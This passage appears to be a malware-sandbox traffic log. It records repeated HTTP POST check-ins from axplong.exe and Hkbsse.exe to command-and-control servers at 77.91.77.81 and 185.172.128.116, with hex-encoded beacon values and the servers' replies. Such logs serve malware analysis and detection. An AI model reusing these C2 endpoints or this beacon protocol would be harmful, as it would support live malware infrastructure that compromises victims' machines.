r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:48.352133989 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	52905	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:48.005932093 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:48.726198912 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:48.731549978 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:10:48.960088968 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	52906	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:48.463929892 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:49.097760916 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:49.098407984 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:49.291279078 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	52909	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:49.073369980 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:49.783078909 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:49.784024954 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:10:50.007618904 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	52911	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:49.401880980 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:50.047084093 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:50.052958012 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:50.243424892 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	52912	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:50.117717028 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:50.809988022 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:50.810753107 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:10:51.024652004 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	52913	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:50.353322983 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:51.006321907 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:51.007388115 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:51.200299978 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	52915	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:51.183048964 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:51.890491009 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:51.891139984 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:10:52.116210938 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	52916	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:51.324121952 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:51.964296103 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:51.965053082 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:52.160001040 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.5	52918	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:52.228672028 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:52.929294109 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:52.929825068 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:10:53.234154940 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.5	52919	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:52.275446892 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:52.927195072 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:52.927870989 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:53.234018087 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.5	52921	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:53.360846043 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:54.055953979 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:54.058851957 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:10:54.288162947 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.5	52922	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:53.360981941 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:54.002252102 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:54.002959967 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:54.196444988 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.5	52924	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:54.306895018 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:54.945368052 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
